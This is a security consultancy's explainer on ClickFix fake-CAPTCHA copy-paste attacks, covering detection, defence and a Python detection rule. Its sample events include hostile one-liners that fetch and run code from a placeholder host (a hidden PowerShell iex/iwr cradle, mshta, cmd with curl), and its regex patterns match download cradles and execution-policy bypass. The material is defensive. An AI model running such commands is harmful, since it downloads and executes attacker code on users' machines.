Threat 03 // ClickFix

ClickFix & Copy-Paste Attacks

The cleverest part of a ClickFix attack is that the victim does all the work. A fake error or fake CAPTCHA convinces them to copy a command and paste it into their own computer — running the attacker’s code with their own hands.

# What it is

ClickFix is a social-engineering attack that persuades a person to run a malicious command themselves. The victim is shown a fake problem — a broken document, a failed update, a “verify you are human” check — and given simple instructions to “fix” it: copy this, paste it here, press Enter.

Those instructions are the attack. Pasting the text into the Windows Run box, a terminal, or a browser console runs the attacker’s code. Because the user carries out every step, there is no malicious attachment for a mail gateway to block and nothing is downloaded through the browser for it to scan; the payload is fetched only by the command the user has just run.

Key idea

ClickFix weaponises helpfulness. It reframes “run this command” as “solve your problem”. The browser’s download warning never appears, because no file ever came through the browser, and the command runs under the victim’s own account with whatever access that account has, because the victim is the one giving the order.

# How the attack works

  1. Bait. The victim lands on a compromised or malicious page — via a search result, an ad, a link, or a QR code.
  2. Fake problem. A convincing overlay appears: a document that “won’t display,” an error that needs a fix, or a CAPTCHA that needs “verification.”
  3. Instructions. The page walks the user through a few steps: press a key combination, paste the clipboard contents, press Enter. The page placed that text on the clipboard itself, usually at the moment the user clicked the fake checkbox or button, so the user never knowingly copied anything.
  4. Self-infection. Those steps run a hidden command, typically a one-line PowerShell, mshta or curl command, that downloads and launches the real payload: an information stealer, remote-access tool or ransomware loader.
  5. Aftermath. The attacker now has code running as the user, and often moves on to credential theft or deeper access.

# Real-world examples

Common disguises used by ClickFix campaigns:

  • Fake CAPTCHA / “Verify you are human.” A familiar-looking check that asks you to paste a value and press Enter instead of clicking images.
  • “This document failed to load.” A shared file that tells you to run a step to “fix display issues.”
  • Fake browser or app update. A pop-up insisting you must run a command to complete a critical update.
  • Fake meeting or support fix. A “join the call” or “repair your connection” prompt that hides a command.

The tell

Legitimate websites, documents and CAPTCHAs never ask you to open the Run dialog or a terminal and paste something. That request, by itself, is the red flag.

# How to detect it

Stop and treat the page as hostile the moment you see any of this:

  • A website or document tells you to press the Windows key + R, or to open PowerShell or a terminal.
  • You are asked to paste something and press Enter to “fix” or “verify.”
  • A “CAPTCHA” gives keyboard instructions instead of a normal image or checkbox.
  • An error message is unusually specific about the exact keys to press.
  • You did not knowingly copy anything, yet you are told to paste from the clipboard.
  • The page creates urgency: the “fix” must be done right now.

# How to defend against it

People

  • Teach one firm rule: never paste a command into the Run box or a terminal because a website, document or pop-up told you to.
  • Make “press Win+R and paste this” an automatic stop-and-report trigger.
  • Reassure staff that early reporting is rewarded, never punished.
  • Run awareness training that shows real fake-CAPTCHA examples.

Technology & process

  • Restrict the Run dialog and scripting tools for standard users where the business allows it (for example the “Remove Run menu from Start Menu” Group Policy, and AppLocker or WDAC rules for PowerShell, mshta and wscript), and accept that a user can still reach a terminal: restriction raises the bar, monitoring catches what gets through.
  • Use endpoint telemetry that flags the process tree this attack produces: explorer.exe (the parent of anything started from the Run dialog) spawning powershell.exe, mshta.exe or cmd.exe with a hidden window, an encoded command or a URL on the command line. The Run dialog’s own history is kept per user under the RunMRU registry key and is worth collecting during an investigation.
  • Filter web and email traffic to cut off the malicious pages and payloads, and where you can, stop script hosts such as powershell.exe and mshta.exe from reaching the internet directly.
  • Have a clear, fast incident-response path for “I think I ran something”, including who to call and how to isolate the device.
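As an added example of the kind of rule such monitoring applies (illustrative code written for this page, not part of the original page or any Pendergrass Consulting product), the Python below scans constructed process-creation events laid out like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) and flags the ClickFix process tree: explorer.exe, the parent of anything launched from the Run dialog, starting a script host whose command line carries a hidden window, an encoded command, a download cradle, a URL or the fake-CAPTCHA lure text that campaigns append as a comment so the Run box looks harmless. The field names, the sample events, the example.invalid URLs and the cue list are assumptions for illustration.

```python
import ntpath
import re

# Parents an interactive copy-paste launch comes from. explorer.exe is the
# parent of anything run from Win+R. (Assumption for this example; extend
# with your own terminal and office hosts if you also cover those routes.)
INTERACTIVE_PARENTS = {"explorer.exe"}

# Script hosts and download tools that ClickFix one-liners run through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Command-line cues. One alone is a lead; several together are a strong hit.
CUES = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass":   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|invoke-restmethod"
        r"|downloadstring|downloadfile|\bcurl\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
    # Lure text is often appended as a comment so the pasted line looks benign.
    "captcha_lure":    re.compile(
        r"not a robot|recaptcha|verification id|verify you are human", re.I),
}

# Constructed sample events (not real telemetry from any incident).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr -UseBasicParsing '
                    'https://example.invalid/verify)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s https://example.invalid/a.txt -o %TEMP%\a.bat && %TEMP%\a.bat"},
]


def classify(event):
    """Return the cue names that fire for one event, or [] if it is not of interest.

    The parent/image check comes first so that ordinary PowerShell automation
    (parent is a scheduler or another script host) is never scored at all.
    """
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    if parent not in INTERACTIVE_PARENTS or image not in SCRIPT_HOSTS:
        return []
    cmd = event["CommandLine"]
    return [name for name, pat in CUES.items() if pat.search(cmd)]


def scan(events):
    """Run classify() over a batch and return the events that fired, with reasons."""
    findings = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            findings.append({"index": i,
                             "image": ntpath.basename(ev["Image"]).lower(),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['image']} flagged ({', '.join(f['reasons'])})")
```

Run against the samples, the three explorer.exe-launched script hosts are flagged (the PowerShell cradle on four cues, mshta and the cmd/curl chain on fewer) while notepad and the backup script started by pwsh.exe are not. An administrator who genuinely types curl into Win+R will trip the cmd rule, so treat a single cue as a lead to triage and several cues, or the lure text, as a page-out, and pair the alert with the RunMRU key and the user’s own report.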

# How Pendergrass Consulting helps

ClickFix is defeated mostly at the human layer, backed by good endpoint hygiene. Pendergrass Consulting delivers security awareness training built around current copy-paste and fake-CAPTCHA lures, hardens endpoints with monitoring and application control, and gives your team a rapid response process so a moment of misplaced trust does not become a breach.


# Frequently asked questions

What is a ClickFix attack?
ClickFix is a social-engineering attack that tricks a person into copying a command and pasting it into their own computer — usually via the Run dialog or a terminal. A fake error message or fake CAPTCHA presents this as a "fix" or "verification step," when it actually runs the attacker's code.
Why is the copy-paste trick so effective?
Because the victim performs every step themselves. There is no attachment to scan and nothing is downloaded through the browser for a gateway to block; the payload arrives only after the user runs the command, and the user runs it willingly because they are convinced they are fixing a problem or proving they are human.
What does a fake CAPTCHA attack look like?
It looks like an ordinary "verify you are human" box. Instead of clicking images, it instructs you to press a key combination, paste something, and press Enter. Those instructions silently run a hidden command on your machine.
What should an employee do if they fall for one?
Stop immediately, disconnect the device from the network, and report it to IT or your security provider right away. Fast reporting dramatically limits the damage — there is no blame in catching it early.


Would your team paste a "quick fix" without thinking?

One trained pause stops this entire attack. Pendergrass Consulting can build that instinct across your organisation with realistic, modern training.